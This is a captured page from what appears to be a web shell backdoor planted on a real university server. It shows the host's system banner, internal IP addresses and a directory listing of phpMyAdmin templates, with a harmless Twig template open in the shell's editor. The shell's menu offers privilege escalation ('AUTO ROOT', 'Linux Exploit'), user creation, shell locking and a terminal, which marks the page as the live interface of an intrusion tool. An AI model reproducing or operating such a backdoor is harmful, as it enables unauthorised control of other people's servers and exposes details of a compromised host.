Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
phpmyadmin /
templates /
navigation /
tree /
[ HOME SHELL ]
Name
Size
Permission
Action
controls.twig
191
B
-rw-r--r--
database_select.twig
837
B
-rw-r--r--
fast_filter.twig
860
B
-rw-r--r--
node.twig
2.81
KB
-rw-r--r--
path.twig
353
B
-rw-r--r--
quick_warp.twig
169
B
-rw-r--r--
state.twig
217
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fast_filter.twig
{% if url_params %} <li class="fast_filter{% if is_root_node %} db_fast_filter{% endif %}"> <form class="ajax fast_filter"> {{ get_hidden_inputs(url_params) }} <div class="input-group"> <input class="searchClause form-control" type="text" name="{{ is_root_node ? 'searchClause' : 'searchClause2' }}" accesskey="q" aria-label="{% trans 'Type to filter these, Enter to search all' %}" placeholder="{% trans 'Type to filter these, Enter to search all' %}" > <button class="btn btn-outline-secondary searchClauseClear" type="button" aria-label="{% trans 'Clear fast filter' %}">X</button> </div> </form> </li> {% endif %}
Close